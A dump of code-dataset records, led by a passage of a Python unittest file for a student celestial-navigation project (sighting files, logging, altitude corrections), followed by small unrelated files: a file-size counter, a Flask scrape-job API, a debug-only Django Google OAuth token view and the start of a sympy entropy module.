\"60d0.0\", 10, 70, 1200, \"Natural\");\r\n \r\n \r\n self.height_1 = 10\r\n self.pressure_1 = 1200\r\n self.temperature_1 = 70\r\n self.altitude_1 = \"60d0.0\"\r\n self.horizon_1 = \"natural\"\r\n self.horizon_2 = \"artificial\"\r\n \r\n\r\n# 100 Constructor\r\n# Analysis\r\n# inputs:\r\n# logFile: string, optional, unvalidated, len >= 1\r\n# outputs:\r\n# returns: instance of Fix\r\n# also: writes \"Start of log\" to log file\r\n#\r\n# Happy tests:\r\n# logFile: \r\n# omitted -> Fix()\r\n# new logfile -> Fix(\"randomName.txt\")\r\n# existing logfile -> Fix(\"myLog.txt\") (assuming myLog.txt exits)\r\n# Sad tests:\r\n# logFile:\r\n# nonstring -> Fix(42)\r\n# length error -> Fix(\"\")\r\n# \r\n def test100_010_ShouldConstructFix(self):\r\n 'Fix.__init__'\r\n self.assertIsInstance(F.Fix(), F.Fix, \r\n \"Major error: Fix not created\")\r\n \r\n def test100_020_ShouldConstructFixWithDefaultFile(self):\r\n theFix = F.Fix()\r\n try:\r\n theLogFile = open(self.DEFAULT_LOG_FILE, 'r')\r\n entry = theLogFile.readline()\r\n del theLogFile\r\n self.assertNotEquals(-1, entry.find(\"Start of log\"), \r\n \"Minor: first line of log is incorrect\")\r\n except IOError:\r\n self.fail()\r\n self.assertIsInstance(theFix, F.Fix, \r\n \"Major: log file failed to create\")\r\n \r\n def test100_025_ShouldConstructWithKeywordParm(self):\r\n try:\r\n theFix = F.Fix(logFile=self.RANDOM_LOG_FILE)\r\n self.assertTrue(True)\r\n except:\r\n self.fail(\"Minor: incorrect keyword specified\")\r\n self.cleanup()\r\n \r\n \r\n def test100_030_ShouldConstructFixWithNamedFile(self):\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n try:\r\n theLogFile = open(self.RANDOM_LOG_FILE, 'r')\r\n entry = theLogFile.readline()\r\n del theLogFile\r\n self.assertNotEquals(-1, entry.find(self.logStartString), \r\n \"Minor: first line of log is incorrect\")\r\n except IOError:\r\n self.fail()\r\n self.assertIsInstance(theFix, F.Fix, \"major: log file failed to create\")\r\n self.cleanup() \r\n \r\n def test100_040_ShouldConstructFixWithExistingFile(self):\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n try:\r\n theLogFile = open(self.RANDOM_LOG_FILE, 'r')\r\n numberOfExpectedEntries = 2\r\n for _ in range(numberOfExpectedEntries):\r\n entry = theLogFile.readline()\r\n self.assertNotEquals(-1, entry.find(self.logStartString), \r\n \"Minor: first line of log is incorrect\")\r\n theLogFile.close()\r\n except IOError:\r\n self.fail()\r\n self.assertIsInstance(theFix, F.Fix, \r\n \"Major: log file failed to create\")\r\n self.cleanup() \r\n \r\n def test100_910_ShouldRaiseExceptionOnFileNameLength(self):\r\n expectedDiag = self.className + \"__init__:\"\r\n with self.assertRaises(ValueError) as context:\r\n F.Fix(\"\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)], \r\n \"Minor: failure to check for log file name length\") \r\n \r\n def test100_920_ShouldRaiseExceptionOnNonStringFile(self):\r\n expectedDiag = self.className + \"__init__:\"\r\n with self.assertRaises(ValueError) as context:\r\n F.Fix(42)\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)], \r\n \"Minor: failure to check for non-string log file name\") \r\n \r\n \r\n# 200 setSightingFile\r\n# Analysis\r\n# inputs:\r\n# sightingFile: string, mandatory, unvalidated, format = f.xml (len(f) >= 1)\r\n# outputs:\r\n# returns: string with file name\r\n# also: writes \"Start of sighting file f.xml\" to log file\r\n#\r\n# Happy tests:\r\n# sightingFile: \r\n# legal file name -> setSightingFile(\"sightingFile.xml\") \r\n# Sad tests:\r\n# sightingFile:\r\n# nonstring -> setSightinghFile(42)\r\n# length error -> setSightingFile(\".xml\")\r\n# nonXML -> setSightingFile(\"sightingFile.txt\")\r\n# missing -> setSightingFile()\r\n# nonexistent file -> setSightingFile(\"missing.xml\")\r\n def test200_010_ShouldConstructWithKeywordParm(self):\r\n 'Minor: '\r\n theFix = F.Fix(logFile=self.RANDOM_LOG_FILE)\r\n try:\r\n result = theFix.setSightingFile(\"CA02_200_ValidStarSightingFile.xml\")\r\n self.assertEquals(result, \"CA02_200_ValidStarSightingFile.xml\")\r\n except:\r\n self.fail(\"Minor: incorrect keyword specified in setSighting parm\")\r\n self.cleanup() \r\n\r\n def test200_020_ShouldSetValidSightingFile(self):\r\n theFix = F.Fix()\r\n result = theFix.setSightingFile(\"CA02_200_ValidStarSightingFile.xml\")\r\n self.assertEquals(result,\"CA02_200_ValidStarSightingFile.xml\")\r\n theLogFile = open(self.DEFAULT_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n self.assertNotEquals(-1, logFileContents[-1].find(self.logSightingString), \r\n \"Minor: first setSighting logged entry is incorrect\")\r\n theLogFile.close()\r\n \r\n def test200_910_ShouldRaiseExceptionOnNonStringFileName(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(42)\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Minor: failure to check for non-string sighting file name\") \r\n \r\n def test200_920_ShouldRaiseExceptionOnFileLengthError(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\".xml\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Minor: failure to check for .GE. 1 sighting file name\") \r\n \r\n def test200_930_ShouldRaiseExceptionOnNonXmlFile1(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"sighting.\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Minor: failure to check for non.xml sighting file extension\")\r\n \r\n def test200_940_ShouldRaiseExceptionOnNonXmlFile2(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"xml\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Minor: failure to delineate between sighting file name and extension\") \r\n \r\n def test200_950_SholdRaiseExceptionOnMissingFileName(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for missing sighting file\") \r\n \r\n \r\n def test200_960_SholdRaiseExceptionOnMissingFile(self):\r\n expectedDiag = self.className + \"setSightingFile:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(self.RANDOM_LOG_FILE+\".xml\")\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for missing sighting file\") \r\n \r\n# 300 getSightings\r\n# Analysis\r\n# inputs:\r\n# via parm: none\r\n# via file: xml description of sighting\r\n# outputs:\r\n# returns: (\"0d0.0\", \"0d0.0\")\r\n# via file: writes body /t date /t time /t adjusted altitude in sorted order\r\n# entry criterion:\r\n# setSightingsFile must be called first\r\n#\r\n# Happy tests:\r\n# sighting file \r\n# valid file with any sightings -> should return (\"0d0.0\", \"0d0.0\")\r\n# valid file with mixed indentation -> should not indicate any errors\r\n# valid file with one sighting -> should log one star body\r\n# valid file with multiple sightings -> should log star bodies in sorted order\r\n# valid file with multiple sightings at same date/time -> should log star bodies in order sorted by body \r\n# valid file with zero sightings -> should not log any star bodies\r\n# valid file with extraneous tag -> should log star(s) without problem\r\n# sighting file contents\r\n# valid body with natural horizon -> should calculate altitude with dip\r\n# valid body with artificial horizon -> should calculate altitude without dip\r\n# valid body with default values -> should calculate altitude with height=0, temperature=72, pressure=1010, horizon-natural\r\n# Sad tests:\r\n# sightingFile:\r\n# sighting file not previously set\r\n# sighting file with invalid mandatory tag (one of each: fix, body, date, time, observation)\r\n# sighting file with invalid tag value (one of each: date, time, observation, height, temperature, pressure, horizon)\r\n\r\n def test300_010_ShouldIgnoreMixedIndentation(self):\r\n testFile = \"CA02_300_GenericValidStarSightingFile.xml\"\r\n expectedResult = (\"0d0.0\", \"0d0.0\")\r\n theFix = F.Fix()\r\n theFix.setSightingFile(testFile)\r\n result = theFix.getSightings()\r\n self.assertTupleEqual(expectedResult, result, \r\n \"Minor: incorrect return value from getSightings\")\r\n\r\n def test300_020_ShouldIgnoreMixedIndentation(self):\r\n testFile = \"CA02_300_ValidWithMixedIndentation.xml\"\r\n theFix = F.Fix()\r\n theFix.setSightingFile(testFile)\r\n try:\r\n theFix.getSightings()\r\n self.assertTrue(True)\r\n except:\r\n self.fail(\"Major: getSightings failed on valid file with mixed indentation\") \r\n\r\n def test300_030_ShouldLogOneSighting(self):\r\n testFile = \"CA02_300_ValidOneStarSighting.xml\"\r\n targetStringList = [\"Aldebaran\", \"2016-03-01\", \"23:40:01\"]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n sightingCount = 0\r\n for logEntryNumber in range(0, len(logFileContents)):\r\n if(logFileContents[logEntryNumber].find(targetStringList[0]) > -1):\r\n sightingCount += 1\r\n for target in targetStringList:\r\n self.assertNotEquals(-1, logFileContents[logEntryNumber].find(target), \r\n \"Major: Log entry is not correct for getSightings\")\r\n self.assertEquals(1, sightingCount)\r\n self.cleanup() \r\n \r\n def test300_040_ShouldLogMultipleSightingsInTimeOrder(self): \r\n testFile = \"CA02_300_ValidMultipleStarSighting.xml\"\r\n targetStringList = [\r\n [\"Sirius\", \"2016-03-01\", \"00:05:05\"],\r\n [\"Canopus\", \"2016-03-02\", \"23:40:01\"]\r\n ]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n # find entry with first star\r\n entryIndex = self.indexInList(targetStringList[0][0], logFileContents)\r\n self.assertLess(-1, entryIndex, \r\n \"failure to find \" + targetStringList[0][0] + \" in log\")\r\n for index in range(entryIndex+1, len(targetStringList)):\r\n entryIndex += 1\r\n if(not(targetStringList[index][0] in logFileContents[entryIndex])):\r\n self.fail(\"failure to find star in log\")\r\n self.cleanup() \r\n\r\n def test300_050_ShouldLogMultipleSightingsWithSameDateTime(self): \r\n testFile = \"CA02_300_ValidMultipleStarSightingSameDateTime.xml\"\r\n targetStringList = [\r\n [\"Acrux\", \"2016-03-01\", \"00:05:05\"],\r\n [\"Sirius\", \"2016-03-01\", \"00:05:05\"],\r\n [\"Canopus\", \"2016-03-02\", \"23:40:01\"]\r\n ]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n # find entry with first star\r\n entryIndex = self.indexInList(targetStringList[0][0], logFileContents)\r\n self.assertLess(-1, entryIndex, \r\n \"failure to find \" + targetStringList[0][0] + \" in log\")\r\n for index in range(entryIndex+1, len(targetStringList)):\r\n entryIndex += 1\r\n if(not(targetStringList[index][0] in logFileContents[entryIndex])):\r\n self.fail(\"failure to find star in log\")\r\n self.cleanup() \r\n\r\n def test300_060_ShouldHandleNoSightings(self): \r\n testFile = \"CA02_300_ValidWithNoSightings.xml\"\r\n targetString1 = \"End of sighting file\"\r\n targetString2 = \"Start of sighting file\"\r\n \r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n endOfSightingFileIndex = self.indexInList(targetString1, logFileContents)\r\n self.assertLess(-1,endOfSightingFileIndex,\r\n \"log file does not contain 'end of sighting file' entry\")\r\n self.assertLess(1, endOfSightingFileIndex,\r\n \"log file does not contain sufficient entries\")\r\n self.assertTrue((targetString2 in logFileContents[endOfSightingFileIndex - 1]))\r\n self.cleanup() \r\n \r\n def test300_070_ShouldIgnoreExtraneousTags(self): \r\n testFile = \"CA02_300_ValidWithExtraneousTags.xml\"\r\n targetStringList = [\r\n [\"Sirius\", \"2016-03-01\", \"00:05:05\"],\r\n ]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n # find entry with first star\r\n entryIndex = self.indexInList(targetStringList[0][0], logFileContents)\r\n self.assertLess(-1, entryIndex, \r\n \"failure to find \" + targetStringList[0][0] + \" in log\")\r\n for index in range(entryIndex+1, len(targetStringList)):\r\n entryIndex += 1\r\n if(not(targetStringList[index][0] in logFileContents[entryIndex])):\r\n self.fail(\"failure to find star in log\")\r\n self.cleanup() \r\n\r\n\r\n def test300_080_ShouldLogStarWithNaturalHorizon(self):\r\n testFile = \"CA02_300_ValidOneStarNaturalHorizon.xml\"\r\n targetStringList = [\"Hadar\", \"2016-03-01\", \"23:40:01\", \"29d55.7\"]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n sightingCount = 0\r\n for logEntryNumber in range(0, len(logFileContents)):\r\n if(logFileContents[logEntryNumber].find(targetStringList[0]) > -1):\r\n sightingCount += 1\r\n for target in targetStringList:\r\n self.assertNotEquals(-1, logFileContents[logEntryNumber].find(target), \r\n \"Major: Log entry is not correct for getSightings\")\r\n self.assertEquals(1, sightingCount)\r\n self.cleanup() \r\n\r\n\r\n def test300_080_ShouldLogStarWithArtificialHorizon(self):\r\n testFile = \"CA02_300_ValidOneStarArtificialHorizon.xml\"\r\n targetStringList = [\"Hadar\", \"2016-03-01\", \"23:40:01\", \"29d55.7\"]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n sightingCount = 0\r\n for logEntryNumber in range(0, len(logFileContents)):\r\n if(logFileContents[logEntryNumber].find(targetStringList[0]) > -1):\r\n sightingCount += 1\r\n for target in targetStringList:\r\n self.assertNotEquals(-1, logFileContents[logEntryNumber].find(target), \r\n \"Major: Log entry is not correct for getSightings\")\r\n self.assertEquals(1, sightingCount)\r\n self.cleanup() \r\n \r\n \r\n def test300_090_ShouldLogStarWithDefaultSightingValues(self):\r\n testFile = \"CA02_300_ValidOneStarWithDefaultValues.xml\"\r\n targetStringList = [\"Hadar\", \"2016-03-01\", \"23:40:01\", \"29d59.9\"]\r\n theFix = F.Fix(self.RANDOM_LOG_FILE)\r\n theFix.setSightingFile(testFile)\r\n theFix.getSightings()\r\n \r\n theLogFile = open(self.RANDOM_LOG_FILE, \"r\")\r\n logFileContents = theLogFile.readlines()\r\n theLogFile.close()\r\n \r\n sightingCount = 0\r\n for logEntryNumber in range(0, len(logFileContents)):\r\n if(logFileContents[logEntryNumber].find(targetStringList[0]) > -1):\r\n sightingCount += 1\r\n for target in targetStringList:\r\n self.assertNotEquals(-1, logFileContents[logEntryNumber].find(target), \r\n \"Major: Log entry is not correct for getSightings\")\r\n self.assertEquals(1, sightingCount)\r\n self.cleanup() \r\n\r\n def test300_910_ShouldRaiseExceptionOnNotSettingSightingsFile(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to set sighting file before getSightings()\") \r\n \r\n def test300_920_ShouldRaiseExceptionOnMissingMandatoryTag(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidWithMissingMandatoryTags.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for missing mandatory tag\") \r\n \r\n def test300_930_ShouldRaiseExceptionOnInvalidBody(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidBody.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\") \r\n \r\n def test300_940_ShouldRaiseExceptionOnInvalidDate(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidDate.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\") \r\n \r\n def test300_950_ShouldRaiseExceptionOnInvalidTime(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidTime.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\") \r\n \r\n def test300_960_ShouldRaiseExceptionOnInvalidObservation(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidObservation.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\") \r\n \r\n def test300_970_ShouldRaiseExceptionOnInvalidHeight(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidHeight.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\" )\r\n \r\n def test300_980_ShouldRaiseExceptionOnInvalidTemperature(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidTemperature.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\" )\r\n \r\n def test300_990_ShouldRaiseExceptionOnInvalidPressure(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidPressure.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\" )\r\n \r\n def test300_995_ShouldRaiseExceptionOnInvalidHorizon(self):\r\n expectedDiag = self.className + \"getSightings:\"\r\n theFix = F.Fix()\r\n with self.assertRaises(ValueError) as context:\r\n theFix.setSightingFile(\"CA02_300_InvalidHorizon.xml\")\r\n theFix.getSightings()\r\n self.assertEquals(expectedDiag, context.exception.args[0][0:len(expectedDiag)],\r\n \"Major: failure to check for invalid body\" )\r\n \r\n \r\n\r\n\r\n \r\n\r\n# helper methods\r\n def indexInList(self, target, searchList):\r\n for index in range(len(searchList)):\r\n if(target in searchList[index]):\r\n return index\r\n return -1\r\n \r\n def cleanup(self):\r\n if(os.path.isfile(self.RANDOM_LOG_FILE)):\r\n os.remove(self.RANDOM_LOG_FILE) \r\n \r\n \r\n \r\n#*******************************************************************************************************************\r\n# Unit Tests\r\n#*******************************************************************************************************************\r\n\r\n#Sighting.Py\r\n#I plan to use the 400's for all of the sightings tests to just make things easier on me, incrementing by 10s\r\n\r\n\r\n# Unit Test: 400_010\r\n# Analysis - Get adjusted Altitude\r\n# inputs\r\n# none\r\n# outputs\r\n# adjusted altitude\r\n# state change\r\n# adjusted altitude changes\r\n#\r\n# Happy path\r\n# nominal case: getAdjustedAltitude()\r\n# Sad path\r\n# none\r\n\r\n def test400_010_ShouldGetAdjustedAltitude(self):\r\n adjustedAltitude = self.sighting.getAdjustedAltitude()\r\n self.assertAlmostEqual(adjustedAltitude, 59.93822, 3)\r\n\r\n# Unit Test: 410_010\r\n# Analysis - Calculate Dip\r\n# inputs\r\n# height\r\n# outputs\r\n# calculated dip\r\n# state change\r\n# none\r\n#\r\n# Happy path\r\n# nominal case: _calculateDip()\r\n# Sad path\r\n# none\r\n\r\n def test410_010_CalculateDipWithNatural(self):\r\n dip = self.sighting._calculateDip(self.height_1, self.horizon_1)\r\n self.assertAlmostEqual(dip, -.05112, 3)\r\n\r\n\r\n def test410_020_CalculateDipWithArtificial(self):\r\n dip = self.sighting._calculateDip(self.height_1, self.horizon_2)\r\n self.assertEqual(dip, 0)\r\n\r\n# Unit Test: 420_010\r\n# Analysis - Calculate Refraction\r\n# inputs\r\n# height\r\n# outputs\r\n# calculated dip\r\n# state change\r\n# none\r\n#\r\n# Happy path\r\n# nominal case: _CalculateRefraction()\r\n# Sad path\r\n# none\r\n\r\n def test420_010_CalculateRefraction(self):\r\n altitudeAngle = Angle.Angle()\r\n altitudeAngle.setDegreesAndMinutes(self.altitude_1)\r\n refraction = self.sighting._calculateRefraction(self.pressure_1, self.temperature_1, altitudeAngle)\r\n # Calculated by hand\r\n self.assertAlmostEqual(refraction, -.0106475, 5)\r\n \r\n \r\n \r\n#500s will be used for SightingsList \r\n \r\n# Unit Test: 500_010\r\n# Analysis - Constructor and getSightingsList\r\n# inputs\r\n# filename\r\n# outputs\r\n# none\r\n# state change\r\n# none\r\n#\r\n# Happy path\r\n# nominal case: SightingsList()\r\n# Sad path\r\n# File does not exist\r\n\r\n def test500_010_CreateSightingsList(self):\r\n sightingsListObject = SightingsList.SightingsList(\"sightingFile.xml\")\r\n sightingList = sightingsListObject.getSightingsList()\r\n self.assertEqual(len(sightingList), 2)\r\n \r\n# Unit Test: 510_010\r\n# Analysis - _extractSighting\r\n# inputs\r\n# xml node\r\n# outputs\r\n# Sighting object\r\n# state change\r\n# none\r\n#\r\n# Happy path\r\n# nominal case: _extractSighting()\r\n# Sad path\r\n# none, already validated\r\n\r\n def test510_010_ShouldCreateSighting(self):\r\n sightingsListObject = SightingsList.SightingsList(\"sightingFile.xml\")\r\n XMLDOM = ET.parse(\"../Resources/sightingFile.xml\")\r\n fix = XMLDOM.getroot()\r\n sightings = []\r\n for sighting in fix:\r\n sightings.append(sightingsListObject._extractSighting(sighting))\r\n for sighting in sightings:\r\n self.assertIsInstance(sighting, Sighting.Sighting)\r\n pass\r\n \r\n \r\n#600s will be used for logFile \r\n \r\n# Unit Test: 600_010\r\n# Analysis - Constructor\r\n# inputs\r\n# filename - optional\r\n# outputs\r\n# none\r\n# state change\r\n# change to log file or creation of log file\r\n#\r\n# Happy path\r\n# nominal case: LogFile()\r\n# Sad path\r\n# bad filename\r\n\r\n def test600_010_ShouldModifyLogFile(self):\r\n logFile = LogFile.LogFile(\"test.txt\")\r\n self.assertIsInstance(logFile, LogFile.LogFile)\r\n self.assertTrue(os.path.isfile('../Resources/' + 'test.txt'))\r\n pass\r\n \r\n def test600_910_BadFileName(self):\r\n with self.assertRaises(ValueError):\r\n LogFile.LogFile(\"test.txsdft\")\r\n\r\n# Unit Test: 610_010\r\n# Analysis - Write To log\r\n# inputs\r\n# filename - optional\r\n# outputs\r\n# none\r\n# state change\r\n# Log has a new entry\r\n#\r\n# Happy path\r\n# nominal case: writeToLogEntry()\r\n# Sad path\r\n# bad filename\r\n\r\n# I have not thought of an easy way to test these types of things. I can always parse the file looking for the new entry, \r\n# but this might be something i implement at a future date\r\n# also, if 600_010_SHouldModifyLogFile() doesn't break, it is likely that this worked as most likely a value error would occur if not","repo_name":"ascherer1993/wbd","sub_path":"SoftwareProcess/Navigation/test/FixTest.py","file_name":"FixTest.py","file_ext":"py","file_size_in_byte":30353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9577874936","text":"import os\nfrom itertools import dropwhile\n\nDIR = 'some_data'\nresult = dict.fromkeys([10 ** value for value in range(1, 6)], 0)\nresult_keys = [0] + list(result.keys())\n\ndef add_to_dict(path):\n size = os.stat(path).st_size\n try:\n current_key = list(dropwhile(lambda x: x <= size, result_keys))[0]\n except IndexError:\n print(f'file {f.name} is too large!')\n else:\n result[current_key] += 1\n\n\nfor root, dirs, files in os.walk(DIR):\n print(root)\n\n for f in os.scandir(root):\n if f.is_file():\n add_to_dict(f)\n\nprint(result)","repo_name":"demade74/de_course","sub_path":"q1/python/Kulushev_Konstantin_dz_7/Kulushev_Konstantin_dz_7_task_4.py","file_name":"Kulushev_Konstantin_dz_7_task_4.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19672382550","text":"from api.config import db\nfrom api.models import ScrapeJob\nfrom flask import abort, redirect\nimport re\n\ndef create(job):\n if not re.match(r'^(https?)://[^\\s/$.?#].[^\\s]*$', job['url']):\n abort(400, \"Misformatted URL.\")\n if not job.get('scrape_text', True) and not job.get('scrape_images', True):\n abort(400, \"Either 'scrape_text' or 'scrape_images' must be true.\")\n\n existing_job = ScrapeJob.get_most_recent_match(job)\n if existing_job is None or job.get('force_new', False):\n new_job = ScrapeJob.from_dict(job)\n db.session.add(new_job)\n db.session.commit()\n return new_job.to_dict(), 201\n else:\n return redirect(\n '/scrape-jobs/' + str(existing_job.id), \n code=303,\n )\n\ndef get_status(job_id):\n existing_job = ScrapeJob.get_by_id(job_id)\n if existing_job is not None:\n return existing_job.to_dict(), 200\n else:\n abort(404, f\"Scrape Job not found for ID: {job_id}\")\n","repo_name":"Berciq/scraper-microservice","sub_path":"api/api/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26902182407","text":"# This is only for testing purposes. Will be removed after integration with frontend.\n\nimport requests\nfrom django.conf import settings\nfrom account.decorators import debug_only\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n@debug_only\ndef google_login(request):\n auth_url = f'https://accounts.google.com/o/oauth2/auth?' \\\n f'client_id={settings.GOOGLE_CLIENT_ID}&' \\\n f'redirect_uri={settings.REDIRECT_URI}&' \\\n f'scope=email profile openid&' \\\n f'response_type=code'\n return HttpResponseRedirect(auth_url)\n\n@debug_only\ndef google_callback(request):\n code = request.GET.get('code')\n \n token_url = 'https://accounts.google.com/o/oauth2/token'\n token_payload = {\n 'code': code,\n 'client_id': settings.GOOGLE_CLIENT_ID,\n 'client_secret': settings.GOOGLE_CLIENT_SECRET,\n 'redirect_uri': settings.REDIRECT_URI,\n 'grant_type': 'authorization_code',\n }\n token_response = requests.post(token_url, data=token_payload)\n\n if token_response.status_code == 200:\n tokens = token_response.json()\n access_token = tokens.get('access_token')\n return HttpResponse(access_token)\n return HttpResponse(\"Invalid credentials\")\n ","repo_name":"ravigrauniyar/pde5backend","sub_path":"account/views/access_token_genrator_view.py","file_name":"access_token_genrator_view.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25567073543","text":"__all__ = [\n 'H_constitutive',\n 'H_external', 'H_ON_external', 'H_OFF_external', 'I_external',\n 'set_n_processes', 'symbolic_H',\n]\n\nimport atexit\nimport logging\nimport math\nimport multiprocessing as mp\nimport os\nimport pathlib\nimport signal\nimport subprocess as sub\nfrom multiprocessing import pool\n\nimport mpmath\nfrom sympy import *\nfrom sympy.abc import *\nfrom sympy import E, N as evalf\n\nimport utils\nfrom functions import log2\nfrom steady_state import alpha_n_external, beta_n_external, palpha, phi_n_external\n\n\ndef set_n_processes(n):\n \"\"\"Initialize number of worker processes in pool. Should be called right after imports.\"\"\"\n global N_PROCESSES\n N_PROCESSES = n\nset_n_processes(os.cpu_count())\n\n\nDOC = {\n 'epsilon': \"ratio between promotor switching rates and protein degradation rate\",\n 'palpha': \"probability of finding the promotor at the ON state\",\n 'N': \"mean number of proteins of a constitutive gene with the same synthesis/degradation rates\",\n 'k': \"upper bound of summation for the entropy calculation\",\n 'precision': \"number of decimal digits of precision\",\n 'method': \"either 'C', 'maple', 'maple-async', 'sympy' or 'sympy-parallel'\",\n 'backup_method': \"(list of) backup method(s) to try if 'method' fails\",\n 'func': \"function to be computed\",\n 'subs': \"dictionay with parameters to 'func'\",\n}\n\nsymbolic_H = {}\n\n\n### 